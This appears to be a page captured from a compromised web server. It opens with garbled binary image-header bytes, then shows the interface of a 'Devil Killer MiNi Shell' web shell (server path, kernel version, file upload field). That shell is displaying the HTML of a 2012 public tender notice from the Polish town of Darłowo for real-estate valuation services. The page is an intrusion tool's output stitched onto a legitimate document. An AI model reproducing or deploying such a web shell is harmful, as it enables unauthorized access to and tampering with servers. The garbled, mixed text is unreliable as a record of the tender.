JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120119/18702-N-2012.html

<p class="kh_header"><b>Darłowo: Wykonywanie w 2012 roku, na terenie Gminy Miasto Darłowo wycen nieruchomości 
(10 rodzajów wycen), oraz potwierdzanie aktualności operatów szacunkowych 
w okresie 12 miesięcy od daty ich sporządzenia.</b><br>
<b>Numer ogłoszenia: 18702 - 2012; data zamieszczenia: 19.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Darłowo , Plac Tadeusza Kościuszki 9, 76-150 Darłowo, woj. zachodniopomorskie, tel. 94 3142223 do 26, faks 94 3142333.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.darlowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie w 2012 roku, na terenie Gminy Miasto Darłowo wycen nieruchomości 
(10 rodzajów wycen), oraz potwierdzanie aktualności operatów szacunkowych 
w okresie 12 miesięcy od daty ich sporządzenia..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonywanie w 2012 roku, na potrzeby Gminy Miasto Darłowo wycen nieruchomości 
(10 rodzajów wycen), oraz potwierdzanie aktualności operatów szacunkowych 
w okresie 12 miesięcy od daty ich sporządzenia.
ZAMÓWIENIE CZĘŚCIOWE NR 1 - wycena działek gruntu do opłat adiacenckich 
z tytułu podziału.W ramach tej części zamówienia planuje się zlecić wycenę 135 działek gruntu. Zamawiający zastrzega, że wymieniona w tej części zamówienia ilość działek jest wielkością szacunkową i nie stanowi ona ani maksymalnej, ani minimalnej ilości działek do wyceny, gdyż wielkość ta wynikać będzie z faktycznego, bieżącego zapotrzebowania Zamawiającego. 
ZAMÓWIENIE CZĘŚCIOWE NR 2  - wycena działek gruntu do ustalenia opłaty adiacenckiej w związku  z wybudowaniem infrastruktury technicznej - określenie wartości przed  wybudowaniem i po wybudowaniu sieci wodociągowych, kanalizacyjnych, ciepłowniczych.
W ramach tej części zamówienia planuje się zlecić wycenę 30 działek gruntu. Zamawiający zastrzega, że wymieniona w tej części zamówienia ilość działek jest wielkością szacunkową i nie stanowi ona ani maksymalnej, ani minimalnej ilości działek do wyceny, gdyż wielkość ta wynikać będzie z faktycznego, bieżącego zapotrzebowania Zamawiającego.
ZAMÓWIENIE CZĘŚCIOWE NR 3   - wycena działek gruntu niezabudowanych przeznaczonych pod drogi.
W ramach tej części zamówienia planuje się zlecić wycenę 20 działek gruntu. Zamawiający zastrzega, że wymieniona w tej części zamówienia ilość działek jest wielkością szacunkową i nie stanowi ona ani maksymalnej, ani minimalnej ilości działek do wyceny, gdyż wielkość ta wynikać będzie z faktycznego, bieżącego zapotrzebowania Zamawiającego.
ZAMÓWIENIE CZĘŚCIOWE NR 4   - wycena działek gruntu z częściami składowymi, 
przeznaczonych pod drogi.
W ramach tej części zamówienia planuje się zlecić wycenę 15 działek gruntu. Zamawiający zastrzega, że wymieniona w tej części zamówienia ilość działek jest wielkością szacunkową i nie stanowi ona ani maksymalnej, ani minimalnej ilości działek do wyceny, gdyż wielkość ta wynikać będzie z faktycznego, bieżącego zapotrzebowania Zamawiającego.
ZAMÓWIENIE CZĘŚCIOWE NR 5 -  wycena działek gruntu niezabudowanych do celów innych niż wymienione jako zadania częściowe Nr1, Nr 2, Nr 3, Nr 4 i Nr 9 .
W ramach tej części zamówienia planuje się zlecić wycenę 110 działek gruntu. Zamawiający zastrzega, że wymieniona w tej części zamówienia ilość działek jest wielkością szacunkową i nie stanowi ona ani maksymalnej, ani minimalnej ilości działek do wyceny, gdyż wielkość ta wynikać będzie z faktycznego, bieżącego zapotrzebowania Zamawiającego. 
ZAMÓWIENIE CZĘŚCIOWE NR 6    - wycena nieruchomości zabudowanych.
W ramach tej części zamówienia planuje się zlecić wycenę 10 nieruchomości zabudowanych. Zamawiający zastrzega, że wymieniona w tej części zamówienia ilość nieruchomości zabudowanych jest wielkością szacunkową i nie stanowi ona ani maksymalnej, ani minimalnej ilości nieruchomości zabudowanych do wyceny, gdyż wielkość ta wynikać będzie z faktycznego, bieżącego zapotrzebowania Zamawiającego.
ZAMÓWIENIE CZĘŚCIOWE NR 7    - wycena lokali mieszkalnych  lub użytkowych  bez lub wraz z pomieszczeniami przynależnymi  i określeniem wartości ułamkowej  prawa do części  gruntu.
W ramach tej części zamówienia planuje się zlecić wycenę 15 lokali mieszkalnych lub użytkowych bez lub wraz z pomieszczeniami przynależnymi  i określeniem wartości ułamkowej  prawa do części  gruntu. Zamawiający zastrzega, że wymieniona w tej części zamówienia ilość lokali mieszkalnych lub użytkowych bez lub wraz 
z pomieszczeniami przynależnymi  i określeniem wartości ułamkowej  prawa do części  gruntu jest wielkością szacunkową i nie stanowi ona ani maksymalnej, ani minimalnej ilości przewidywanych do wyceny, gdyż wielkość ta wynikać będzie z faktycznego, bieżącego zapotrzebowania Zamawiającego.
ZAMÓWIENIE CZĘŚCIOWE NR 8   - wycena pomieszczeń gospodarczych przynależnych do lokali i określeniem wartości ułamkowej prawa do części gruntu.
W ramach tej części zamówienia planuje się zlecić wycenę 5 pomieszczeń gospodarczych przynależnych do lokali i określeniem wartości ułamkowej prawa do części gruntu. Zamawiający zastrzega, że wymieniona w tej części zamówienia ilość pomieszczeń gospodarczych przynależnych do lokali i określeniem wartości ułamkowej prawa do części gruntu jest wielkością szacunkową i nie stanowi ona ani maksymalnej, ani minimalnej ilości przewidywanych do wyceny, gdyż wielkość ta wynikać będzie z faktycznego, bieżącego zapotrzebowania Zamawiającego.
ZAMÓWIENIE CZĘŚCIOWE NR 9    - wycena działek  gruntu celem przekształcenia prawa użytkowania wieczystego w prawo własności w myśl ustawy z dnia 29 lipca 2005 roku o przekształceniu prawa użytkowania wieczystego w prawo własności 
nieruchomości.
W ramach tej części zamówienia planuje się zlecić wycenę 100 działek gruntu celem przekształcenia prawa użytkowania wieczystego w prawo własności. Zamawiający zastrzega, że wymieniona w tej części zamówienia ilość działek gruntu celem przekształcenia prawa użytkowania wieczystego w prawo własności jest wielkością szacunkową i nie stanowi ona ani maksymalnej, ani minimalnej ilości przewidywanej do wyceny, gdyż wielkość ta wynikać będzie z faktycznego, bieżącego zapotrzebowania Zamawiającego.
ZAMÓWIENIE CZĘŚCIOWE NR 10 - ustalanie wzrostu wartości nieruchomości, w celu
naliczenia jednorazowej opłaty ustalonej w miejscowym planie zagospodarowania przestrzennego miasta Darłowo w myśl art.36 ust.4 ustawy z dnia 27 marca 2003 roku o planowaniu i zagospodarowaniu przestrzennym (Dz .U. Nr 80,  poz. 717 z dnia 10 maja 2003 r.).
W ramach tej części zamówienia planuje się zlecić wycenę 20 nieruchomości, w celu
naliczenia jednorazowej opłaty ustalonej w miejscowym planie zagospodarowania przestrzennego miasta Darłowo. Zamawiający zastrzega, że wymieniona w tej części zamówienia ilość nieruchomości w celu naliczenia jednorazowej opłaty ustalonej 
w miejscowym planie zagospodarowania przestrzennego miasta Darłowo  jest wielkością szacunkową i nie stanowi ona ani maksymalnej, ani minimalnej ilości przewidywanej do wyceny, gdyż wielkość ta wynikać będzie z faktycznego, bieżącego zapotrzebowania Zamawiającego.

Zamawiający zastrzega sobie, pod rygorem odrzucenia oferty, że złożone oferty obligatoryjnie muszą zawierać pisemne zobowiązanie wykonawcy do potwierdzania 
w okresie 12 miesięcy od daty sporządzenia operatu szacunkowego, za cenę umowną 50% brutto za poszczególny rodzaj wycen określonych jako zamówienia częściowe: Nr 1, Nr 2, Nr 3, Nr 4, Nr 5,  Nr 6, Nr 7, Nr 8, Nr 9, Nr 10 i w terminie 7 dni od daty otrzymania zlecenia.  Zlecanie potwierdzenia aktualności poszczególnych operatów szacunkowych, Zamawiający będzie przekazywał Wykonawcy na podstawie zleceń..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W prowadzonym postępowaniu przetargowym Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ubiegający się o udzielenie zamówienia publicznego Wykonawca zobowiązany jest do przedłożenia aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej,wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków 
o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. 
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast wyżej opisanych dokumentów, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości;
b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenia społeczne 
    i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub 
    rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania 
    decyzji właściwego organu;
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ubiegający się o udzielenie zamówienia publicznego Wykonawca zobowiązany jest do przedłożenia:
1. Informacji o Wykonawcy z ostatnich trzech lat, a w przypadku gdy okres
    prowadzenia działalności jest krótszy - z tego okresu - określającą ilość lat
    funkcjonowania na rynku, profil prowadzonej działalności gospodarczej,
    przeciętną liczbę zatrudnionych pracowników oraz liczebność personelu
    kierowniczego.
2. Wykazu imiennego osób, które będą wykonywać zamówienie z podaniem ich
    doświadczenia i kwalifikacji zawodowych oraz kserokopie uprawnień
    wymaganych prawem niezbędnych do realizacji przedmiotu zamówienia, a także 
    zaświadczenia o przynależności do stosownych Izb.
3.Wykazu wykonanych w okresie ostatnich trzech lat zadań, a jeżeli okres prowadzenia działalności gospodarczej jest krótszy niż trzy lata - to z tego okresu zbliżonych zakresem do przedmiotu zamówienia. Wykaz ten należy sporządzić 
w formie tabeli z podaniem nazwy zamówienia, zakresu wykonanych wycen, wartości, nazwy Zamawiającego, roku wykonania. Musi być on poparty stosownymi referencjami - minimum jedna referencja.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy ubiegający się o udzielenie zamówienia publicznego nie mogą podlegać wykluczeni  z ubiegania się o nie na mocy art. 24, ust.1 i ust. 2 pkt. 1 ustawy Prawo zamówień publicznych, oraz zobowiązani są spełniać warunki zawarte w art. 22 ust.1 ustawy Prawo zamówień publicznych. W celu spełnienia tych warunków Wykonawcy zobowiązani są do złożenia w ofercie przetargowej wymaganych oświadczeń.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie Wykonawcy, że zobowiązuje się do potwierdzania aktualności 
    wykonanych przez siebie operatów szacunkowych, w okresie 12 miesięcy od 
    ich wykonania, za cenę 50% wynagrodzenia brutto określonego dla
    poszczególnych (wybranych) zamówień częściowych, które określone są 
    w ppkt. 3.1. S.I.W.Z. opisane jako zamówienia częściowe: Nr 1, Nr 2, Nr 3, 
    Nr 4, Nr 5, Nr 6, Nr 7, Nr 8, Nr 9, Nr 10, a sposób wynagradzania opisany jest
    w ppkt.17.2.
2. Oświadczenie Wykonawcy, że zapoznał się ze Specyfikacją Istotnych Warunków 
    Zamówienia i ją akceptuje.
3. Oświadczenie Wykonawcy, że zobowiązuje się do podpisania umowy na warunkach 
    podanych w projekcie umowy.
4. Oświadczenie Wykonawcy, że akceptuje podany w S.I.W.Z. termin związania
    złożoną ofertą.
5. Oświadczenie Wykonawcy, że spełnia warunki udziału w postępowaniu    
    określone w pkt. 8  S.I.W.Z.
6. Oświadczenie Wykonawcy, że przyjmuje określone przez Zamawiającego 
    w ppkt.  7.3. S.I.W.Z. terminy wykonania wycen na poszczególne zamówienia
    częściowe oznaczone jako: Nr 1, Nr 2, Nr 3, Nr 4, Nr 5,  Nr 6, Nr 7, Nr 8,
    Nr 9, Nr 10,oraz na potwierdzanie aktualności operatów szacunkowych.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy lub dla poszczególnych zleceń jednostkowych, w stosunku do treści oferty, 
w przypadku wystąpienia niżej wymienionych okoliczności, których Zamawiający nie był w stanie przewidzieć przed publikacją ogłoszenia o przetargu:
1) wystąpienie robót dodatkowych lub zamiennych, których wykonanie uzależnia
     realizację zamówienia podstawowego; 
2) wystąpienie niekorzystnych warunków atmosferycznych uniemożliwiających
    wykonanie usług zgodnie z ich technologią i warunkami technicznymi 
    zapewniającymi właściwą jakość ich wykonania, albo innych zdarzeń, niezależnych
   od Wykonawcy, wymuszających przerwę w realizacji zamówienia; 
3) wystąpienie niekorzystnych warunków gruntowych (np. wysoki poziom wód
    gruntowych) uniemożliwiających wykonanie usług; 
4) przekształcenie lub zmiana siedziby firmy którejkolwiek ze stron umowy; 
5) zmiana osób reprezentujących strony albo innych osób, które z nazwiska są
    wymienione w umowie; 
6) zajdą inne okoliczności, niezależne od Wykonawcy, których nie można było 
    przewidzieć w dniu zawarcia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.darlowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Darłowie, 76-150 Darłowo, ulica Plac Tadeusza Kościuszki 9 lub pobrać ze strony internetowej : www.darlowo.pl  z zakładki przetargi, lub z BIP Zarządzenia Burmistrza 2012 rok.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.01.2012 godzina 10:30, miejsce: Oferty należy złożyć w sekretariacie - pokój nr 21 Urzędu Miejskiego w Darłowie 
z siedzibą w Darłowie(kod pocztowy 76-150) przy ulicy: Plac Tadeusza Kościuszki 9..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





